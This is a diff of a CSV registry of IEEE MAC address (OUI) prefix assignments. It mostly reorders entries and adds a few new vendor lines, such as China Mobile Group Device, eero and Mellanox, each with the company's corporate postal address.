+MA-L,103D3E,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,D0CBDD,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,44AC85,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,18A9ED,eero inc.,660 3rd Street San Francisco CA US 94107 @@ -22519,54 +22514,59 @@ MA-L,08C0EB,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunn MA-L,9C0591,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " MA-L,58A2E1,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " MA-L,B0CF0E,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " +MA-L,94BE09,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,BC9E2C,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,C80C53,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,544DD4,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,C02D2E,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,885721,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " MA-L,E49652,"vivo Mobile Communication Co., Ltd.","No.1, vivo Road, Chang'an Dongguan Guangdong CN 523860 " MA-L,D4A5B4,"Hengji Jiaye (Hangzhou) Technology Co., Ltd","Room 809, Building B, Yingfeite Technology Park, No. 459 Jianghong Road, Changhe Street, Binjiang District, Hangzhou City, Zhejiang Province Hangzhou Zhejiang CN 310000 " -MA-L,A03C20,Sagemcom Broadband SAS,"250, route de l'Empereur Rueil Malmaison Cedex hauts de seine FR 92848 " MA-L,204D52,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " MA-L,F02C59,Chipsea Technologies (Shenzhen) Crop.,"Room 301, Building 1, Shenzhen Bay Innovation and Technology Center, Keyuan Avenue, High-tech Zone Community, Yuehai Subdistrict, Nanshan District, Shenzhen Shenzhen CN 518000 " MA-L,044A69,Shenzhen Phaten Tech. LTD,"C-6 ideamonto industril 7002 Songbai Road Guangming District Shenzhen City Guangdong, China Shenzhen CN 518108 " -MA-L,FC395A,SonicWall ,1033 McCarthy Blvd Milpitas CA US 95035 -MA-L,0CFE7B,Vantiva USA LLC,"4855 Peachtree Industrial Blvd, Suite 200 Norcross GA US 30902 " -MA-L,B0D5FB,"Google, Inc.",1600 Amphitheatre Parkway Mountain View CA US 94043 -MA-L,48D01C,AltoBeam Inc.,"B808, Tsinghua Tongfang Hi-Tech Plaza, Haidian Beijing Beijing CN 100083 " MA-L,587AB1,"Shanghai Lixun Information Technology Co., Ltd.","Room 2111-L, No. 89 Yunling East Road Putuo District Shanghai CN 200333 " MA-L,04B5C1,ITEL MOBILE LIMITED,"RM B3 & B4 BLOCK B, KO FAI INDUSTRIAL BUILDING NO.7 KO FAI ROAD, YAU TONG, KLN, H.K Hong Kong KOWLOON HK 999077 " MA-L,28C97A,"New H3C Technologies Co., Ltd","466 Changhe Road, Binjiang District Hangzhou Zhejiang CN 310052 " +MA-L,A03C20,Sagemcom Broadband SAS,"250, route de l'Empereur Rueil Malmaison Cedex hauts de seine FR 92848 " MA-L,C49A89,"Suzhou K-Hiragawa Electronic Technology Co.,Ltd","No.1 Zhipu Road, Qiandeng Town Suzhou Jiangsu CN 215341 " MA-L,ACBDF7,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 +MA-L,FC395A,SonicWall ,1033 McCarthy Blvd Milpitas CA US 95035 +MA-L,0CFE7B,Vantiva USA LLC,"4855 Peachtree Industrial Blvd, Suite 200 Norcross GA US 30902 " +MA-L,B0D5FB,"Google, Inc.",1600 Amphitheatre Parkway Mountain View CA US 94043 +MA-L,48D01C,AltoBeam Inc.,"B808, Tsinghua Tongfang Hi-Tech Plaza, Haidian Beijing Beijing CN 100083 " MA-L,C817F5,"Nanjing Qinheng Microelectronics Co., Ltd.","No.18, Ningshuang Road Nanjing Jiangsu CN 210012 " MA-L,D8B2AA,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " MA-L,9014AF,Cambium Networks Limited,"Unit B2, Linhay Business Park, Ashburton Devon GB TQ13 7UP " -MA-L,2CF814,"Cisco Systems, Inc",80 West Tasman Drive San Jose CA US 94568 MA-L,F41563,F5 Inc.,1322 North Whitman Lane Liberty Lake WA US 99019 -MA-L,CC67D8,"Telin Semiconductor (Wuhan) Co.,Ltd","Room 1003 Buliding 5 , 2377 Shenkun Road ,Minhang District Shanghai CN 201106 " -MA-L,64AC2B,Juniper Networks,1133 Innovation Way Sunnyvale CA US 94089 -MA-L,CC22FE,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,34DAA1,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 -MA-L,CCFAF1,Sagemcom Broadband SAS,"250, route de l'Empereur Rueil Malmaison Cedex hauts de seine FR 92848 " -MA-L,2C9D5A,"Flaircomm Microelectronics,Inc.","7F,Guomai Building,Guomai Science and Technology Park,116 Jiangbin East Avenue,Mawei District,Fuzhou City Fuzhou FUJIAN CN 350015 " +MA-L,CC22FE,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 +MA-L,CC67D8,"Telin Semiconductor (Wuhan) Co.,Ltd","Room 1003 Buliding 5 , 2377 Shenkun Road ,Minhang District Shanghai CN 201106 " +MA-L,2CF814,"Cisco Systems, Inc",80 West Tasman Drive San Jose CA US 94568 MA-L,88DA04,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,04749E,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " -MA-L,8C8B5B,Wistron Neweb Corporation,"No.20,Park Avenue II,Hsinchu Science Park Hsin-Chu R.O.C. TW 308 " +MA-L,CCFAF1,Sagemcom Broadband SAS,"250, route de l'Empereur Rueil Malmaison Cedex hauts de seine FR 92848 " +MA-L,2C9D5A,"Flaircomm Microelectronics,Inc.","7F,Guomai Building,Guomai Science and Technology Park,116 Jiangbin East Avenue,Mawei District,Fuzhou City Fuzhou FUJIAN CN 350015 " MA-L,243408,Edgecore Americas Networking Corporation,20 Mason Irvine CA US 92618 +MA-L,64AC2B,Juniper Networks,1133 Innovation Way Sunnyvale CA US 94089 MA-L,84D0DB,"Guangdong Juan Intelligent Technology Joint Stock Co., Ltd.","The first and second floors of Building 2  (Plant No. 2), West Side of Shanxi Village, Dashi Street,Panyu District, Guangzhou Guangzhou Guangdong CN 510000 " +MA-L,8C8B5B,Wistron Neweb Corporation,"No.20,Park Avenue II,Hsinchu Science Park Hsin-Chu R.O.C. TW 308 " MA-L,A86D04,Siemens AG,Hermann-Papst-Strasse 1 St. Georgen DE 78112 MA-L,4C46D1,"Guangzhou V-Solution Telecommunication Technology Co.,Ltd.","601,Building B2,No.162,Science Avenue,Science City,Guangzhou High-tech Industrial Development Zone,Guangdong Province,China Guangzhou Guangdong CN 510663 " +MA-L,44388C,"Sumitomo Electric Industries, Ltd","1-1-3, Shimaya, Konohana-ku Osaka JP 554-0024 " +MA-L,7C7BBF,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " +MA-L,8C2E72,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " MA-L,DC7035,Shengzhen Gongjin Electronics,"No. 2 Danzi North Road, Kengzi Street, Pingshan District Shenzhen Guangdong CN 518122 " MA-L,ECED04,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,9C971B,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,F8CF52,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,5C6783,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " -MA-L,44388C,"Sumitomo Electric Industries, Ltd","1-1-3, Shimaya, Konohana-ku Osaka JP 554-0024 " MA-L,BC515F,Nokia Solutions and Networks India Private Limited,"Plot 45, Fathima Nagar Nemilicherry,Chrompet Chennai Taminadu IN 600044 " MA-L,28D41E,"Barrot Technology Co.,Ltd.","A1009,Block A,Jia Hua Building,No.9 Shangdi 3rd Street,Haidian District,Beijing beijing beijing CN 100000 " MA-L,D49D9D,"Shenzhen Goodocom lnformation Technology Co.,Ltd.","3rd Floor, Xia Valley, Meisheng Huigu Science and Technology Industrial Park, 83 Dabao Road, Baoan District 33, Shenzhen Shenzhen CN 518000 " -MA-L,7C7BBF,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " -MA-L,8C2E72,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " MA-L,80F1B2,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " -MA-L,007007,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " MA-L,88127D,"Shenzhen Melon Electronics Co.,Ltd","2F, Building E, Digital Silicon Valley, No.89 Hengping Road, Yuanshan Subdistrict, Longgang District, Shenzhen, Guangdong, China Shenzhen Guangdong CN 518100 " +MA-L,007007,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " MA-L,44CBAD,Xiaomi Communications Co Ltd,"#019, 9th Floor, Building 6, 33 Xi'erqi Middle Road Beijing Haidian District CN 100085 " MA-L,544EF0,"Roku, Inc",1173 Coleman Ave San Jose CA US 95110 MA-L,B00C9D,"Quectel Wireless Solutions Co.,Ltd.","7th Floor, Hongye Building, No.1801 Hongmei Road, Xuhui District Shanghai CN 200233 " @@ -30051,49 +30051,48 @@ MA-L,841FE8,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area S MA-L,94C2EF,ASKEY COMPUTER CORP,"10F,No.119,JIANKANG RD,ZHONGHE DIST NEW TAIPEI TAIWAN TW 23585 " MA-L,E467A6,BSH Hausgeräte GmbH,Im Gewerbepark B35 Regensburg Bayern DE 93059 MA-L,507973,"Inagile Electronic Technology Co.,LTD.","Building 8, No.1 Jingyi Road, Wuzhong Free Trade Zone, Suzhou, Jiangsu, China Suzhou CN 215000 " -MA-L,30D51F,Prolights,Via Adriano Olivetti snc Minturno Latina IT 04026 -MA-L,18FB8E,VusionGroup,Kalsdorfer Straße 12 Fernitz-Mellach Steiermark AT 8072 +MA-L,74A57E,Panasonic Ecology Systems,"4017, Azashimonakata, Takaki-cho Kasugai Aichi JP 4868522 " +MA-L,7CE913,Fantasia Trading LLC,"5350 Ontario Mills Pkwy, Suite 100 Ontario CA US 91764 " +MA-L,E0CBBC,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 MA-L,683A1E,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 MA-L,F89E28,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 MA-L,388479,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 -MA-L,74A57E,Panasonic Ecology Systems,"4017, Azashimonakata, Takaki-cho Kasugai Aichi JP 4868522 " -MA-L,6C15DB,Arcadyan Corporation,"No.8, Sec.2, Guangfu Rd. Hsinchu City Hsinchu TW 30071 " -MA-L,7CE913,Fantasia Trading LLC,"5350 Ontario Mills Pkwy, Suite 100 Ontario CA US 91764 " MA-L,382A8B,"nFore Technology Co., Ltd.","5F, No.31, Ln. 258, Ruiguang Rd., Neihu Dist., Taipei city TW 114 " -MA-L,E0CBBC,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 +MA-L,18FB8E,VusionGroup,Kalsdorfer Straße 12 Fernitz-Mellach Steiermark AT 8072 +MA-L,30D51F,Prolights,Via Adriano Olivetti snc Minturno Latina IT 04026 MA-L,D468BA,Shenzhen Sundray Technologies company Limited,"6th Floor,Block A1, Nanshan iPark, Nanshan District, Shenzhen 518055 Guangdong CN " MA-L,9C3A9A,Shenzhen Sundray Technologies company Limited,"5th Floor, Block A4, Nanshan ipark,NO.1001 Xue Yuan Road, Nanshan District, Shenzhen 518055, P.R. China Shenzhen Guangdong CN 518057 " MA-L,186F2D,Shenzhen Sundray Technologies company Limited,"5th Floor, Block A4, Nanshan ipark,NO.1001 Xue Yuan Road, Nanshan District, Shenzhen 518055, P.R. China Shenzhen Guangdong CN 518057 " -MA-L,08B3D6,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " MA-L,782B60,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " MA-L,70B51A,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " MA-L,FC79DD,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " -MA-L,C853E1,"Douyin Vision Co., Ltd","No.1 Building, Zhonghang Square, West Road of the Northern 3rd Circuit, Haidian Distrct Beijing Beijing CN 100098 " -MA-L,DC396F,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,F414BF,LG Innotek,"26, HANAMSANDAN 5BEON-RO Gwangju Gwangsan-gu KR 506-731 " MA-L,5C4979,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,DC396F,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,C853E1,"Douyin Vision Co., Ltd","No.1 Building, Zhonghang Square, West Road of the Northern 3rd Circuit, Haidian Distrct Beijing Beijing CN 100098 " +MA-L,08B3D6,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " MA-L,2C6F37,Nokia,600 March Road Kanata Ontario CA K2K 2E6 MA-L,941787,Nokia,600 March Road Kanata Ontario CA K2K 2E6 +MA-L,6C15DB,Arcadyan Corporation,"No.8, Sec.2, Guangfu Rd. Hsinchu City Hsinchu TW 30071 " MA-L,587961,Microsoft Corporation,One Microsoft Way REDMOND WA US 98052 -MA-L,F414BF,LG Innotek,"26, HANAMSANDAN 5BEON-RO Gwangju Gwangsan-gu KR 506-731 " -MA-L,50E636,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,60B58D,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,34E1A9,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 -MA-L,48DD0C,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,3C5CF1,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,F8BC0E,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,C4F174,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,649714,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,40475E,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,20E6DF,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,5027A9,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,D88ED4,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,649714,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,20BECD,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,C8B82F,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,1422DB,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,189088,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,48DD0C,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,50E636,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,E8D3EB,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,C06F98,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,8C53D2,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,20BECD,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,C8B82F,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,24615A,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,ACF70D,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,248A07,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " @@ -30104,59 +30103,60 @@ MA-L,B86061,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xiche MA-L,C875F4,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,8C1A50,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,88DA18,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,B8E924,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " -MA-L,2C5EAB,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " MA-L,B8CEF6,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " MA-L,C470BD,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " +MA-L,B8E924,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " MA-L,507097,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,E83A4B,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,3CE3E7,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,187CAA,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,6CC36A,"vivo Mobile Communication Co., Ltd.","No.1, vivo Road, Chang'an Dongguan Guangdong CN 523860 " -MA-L,5872C9,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " +MA-L,2C5EAB,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " +MA-L,8C53D2,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,38E563,"GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD","NO.18 HAIBIN ROAD, DONG GUAN GUANG DONG CN 523860 " -MA-L,58FCE3,"Funshion Online Technologies Co.,Ltd","2101, Floor 1-2, Building 9, Anzhen Xili District 3, Chaoyang District, Beijing Beijing CN 100029 " +MA-L,5872C9,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " MA-L,30C599,ASUSTek COMPUTER INC.,"15,Li-Te Rd., Peitou, Taipei 112, Taiwan Taipei Taiwan TW 112 " MA-L,3C1640,"Qingdao Haier Technology Co.,Ltd","Building C01,Haier Information Park,No.1 Haier Road Qingdao CN 266101 " -MA-L,0023E9,F5 Inc.,401 Elliott Ave. W. Seattle WA US 98119 -MA-L,40BC68,"Funshion Online Technologies Co.,Ltd","2101, Floor 1-2, Building 9, Anzhen Xili District 3, Chaoyang District, Beijing Beijing CN 100029 " -MA-L,889AFF,"SystemX Co.,Ltd.","102, Gosan-ro Gunpo-si Gyeonggi-do KR 15849 " MA-L,B8DDE8,"Sichuan Tianyi Comheart Telecom Co.,LTD","No.198,First Section,Snow Mountain Avenue, Jinyuan Town, Dayi County Chengdu Sichuan CN 611330 " -MA-L,78A1D8,"ShenzhenEnjoyTechnologyCo.,Ltd","Building A, No.1 Qianwan 1st Road, QianHai Shenzhen HongKong Cooperation Zone, Shenzhen,China shenzhen guangdong CN 518108 " MA-L,30FEFA,"Cisco Systems, Inc",80 West Tasman Drive San Jose CA US 94568 MA-L,6C4FA1,"Cisco Systems, Inc",80 West Tasman Drive San Jose CA US 94568 +MA-L,40BC68,"Funshion Online Technologies Co.,Ltd","2101, Floor 1-2, Building 9, Anzhen Xili District 3, Chaoyang District, Beijing Beijing CN 100029 " +MA-L,889AFF,"SystemX Co.,Ltd.","102, Gosan-ro Gunpo-si Gyeonggi-do KR 15849 " +MA-L,78A1D8,"ShenzhenEnjoyTechnologyCo.,Ltd","Building A, No.1 Qianwan 1st Road, QianHai Shenzhen HongKong Cooperation Zone, Shenzhen,China shenzhen guangdong CN 518108 " +MA-L,58FCE3,"Funshion Online Technologies Co.,Ltd","2101, Floor 1-2, Building 9, Anzhen Xili District 3, Chaoyang District, Beijing Beijing CN 100029 " MA-L,409595,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 +MA-L,0023E9,F5 Inc.,401 Elliott Ave. W. Seattle WA US 98119 MA-L,48CA68,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,747786,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,D842F7,"Tozed Kangwei Tech Co.,Ltd","Room 1301, NO. 37 Jinlong , Nansha Street, Xiangjiang Financial Business Center, Nansha District GuangZhou CN 511466 " +MA-L,E08614,"Inseego Wireless, Inc","9710 Scranton Rd., Suite 200 San Diego CA US 92121 " MA-L,1886C3,Nokia,600 March Road Kanata Ontario CA K2K 2E6 MA-L,087671,Juniper Networks,1133 Innovation Way Sunnyvale CA US 94089 MA-L,A46B1F,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,E8CA50,"Bouffalo Lab (Nanjing) Co., Ltd.","5F, Gongxiang Space, No.100 Tuanjie Road, Nanjing, China Nanjing Jiangsu CN 211800 " MA-L,2801CD,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " -MA-L,E08614,"Inseego Wireless, Inc","9710 Scranton Rd., Suite 200 San Diego CA US 92121 " +MA-L,68FE71,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " +MA-L,D86B83,"Nintendo Co.,Ltd","11-1 HOKOTATE-CHO KAMITOBA,MINAMI-KU KYOTO KYOTO JP 601-8501 " +MA-L,40EB21,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,A8C407,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,508D62,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,DC121D,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " -MA-L,40EB21,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " -MA-L,68FE71,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " -MA-L,D86B83,"Nintendo Co.,Ltd","11-1 HOKOTATE-CHO KAMITOBA,MINAMI-KU KYOTO KYOTO JP 601-8501 " +MA-L,2C0369,ACCTON TECHNOLOGY CORPORATION,"No.1, Creation Road 3, Hsinchu Science Park, Hsinchu TW 30077 " MA-L,C07415,IntelPro Inc.,"19F.-1, No. 168, Sec. 2, Fuxing 3rd Rd., Zhubei City, Hsinchu County TW 302052 " MA-L,30305F,Valeo Schalter und Sensoren GmbH,Valeostr. 1 Wemding DE 86650 MA-L,787835,IEEE Registration Authority,445 Hoes Lane Piscataway NJ US 08554 MA-L,8C96A5,"New H3C Technologies Co., Ltd","466 Changhe Road, Binjiang District Hangzhou Zhejiang CN 310052 " +MA-L,5478F0,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " MA-L,BCD22C,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " -MA-L,2C0369,ACCTON TECHNOLOGY CORPORATION,"No.1, Creation Road 3, Hsinchu Science Park, Hsinchu TW 30077 " +MA-L,E03AAA,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,509903,"Meta Platforms, Inc.",1601 Willow Road Menlo Park CA US 94025 -MA-L,64681A,DASAN Network Solutions,"401, 20, Gwacheon-daero 7-gil, Gwacheon-si Gyeonggi-do KR 13493 " MA-L,40268E,"Shenzhen Photon Leap Technology Co., Ltd.","15/F, Building 2, Yongxin Times Square, Interchange of Dongbin Road and Nanguang Road Shenzhen CN 518054 " -MA-L,5478F0,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " MA-L,74F441,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " -MA-L,E03AAA,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,343916,"Google, Inc.",1600 Amphitheatre Parkway Mountain View CA US 94043 -MA-L,64D9C2,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,64681A,DASAN Network Solutions,"401, 20, Gwacheon-daero 7-gil, Gwacheon-si Gyeonggi-do KR 13493 " MA-L,20E7C8,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " MA-L,000432,"Voyetra Turtle Beach, Inc.",15822 Bernardo Center Drive Suite 105 San Diego CA US 92127 +MA-L,64D9C2,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,34B5F3,IEEE Registration Authority,445 Hoes Lane Piscataway NJ US 08554 MA-L,D427FF,Sagemcom Broadband SAS,"250, route de l'Empereur Rueil Malmaison Cedex hauts de seine FR 92848 " MA-L,40497C,eero inc.,660 3rd Street San Francisco CA US 94107 @@ -37563,12 +37563,13 @@ MA-L,4CC8A1,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 MA-L,B4E85C,fünfeinhalb Funksysteme GmbH,Chemnitzer Straße 78A Dresden Saxony DE 01187 MA-L,64A0AC,Adtran Inc,901 Explorer Blvd. Huntsville AL US 35806-2807 MA-L,A083B4,Velorum B.V,Kalkhofseweg 20 Haps NL 5443NA +MA-L,8C0572,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " +MA-L,9C7DC0,"Tech4home, Lda",Rua de Fundoes N151 Sao Joao da Madeira Aveiro PT 3700-121 MA-L,600A8C,Shenzhen Sundray Technologies company Limited,"1st Floor Building A1, Nanshan i Park, No.1001 Xueyuan Road, Nanshan District, Shenzhen, Guangdong Province, P. R. China Shenzhen GuangDong CN 518057 " MA-L,102F6E,Shenzhen Sundray Technologies company Limited,"5th Floor, Block A4, Nanshan ipark,NO.1001 Xue Yuan Road, Nanshan District, Shenzhen 518055, P.R. China Shenzhen Guangdong CN 518057 " MA-L,B00B22,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " -MA-L,8C0572,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " MA-L,1025CE,ELKA - Torantriebe GmbH u. Co. Betriebs KG,Dithmarscher Straße 9 Tönning DE 25832 -MA-L,9C7DC0,"Tech4home, Lda",Rua de Fundoes N151 Sao Joao da Madeira Aveiro PT 3700-121 +MA-L,B4E53E,Ruckus Wireless,350 West Java Drive Sunnyvale CA US 94089 MA-L,20A716,Silicon Laboratories, 400 West Cesar Chavez Austin TX US 78701 MA-L,C09B9E,Silicon Laboratories, 400 West Cesar Chavez Austin TX US 78701 MA-L,DCEC4F,Guangzhou Shiyuan Electronic Technology Company Limited,"No.6, 4th Yunpu Road, Yunpu industry District Guangzhou Guangdong CN 510530 " @@ -37578,57 +37579,56 @@ MA-L,3061A2,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan MA-L,E0286D,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,444E6D,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,F0B014,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 -MA-L,485D35,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 -MA-L,B4FC7D,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 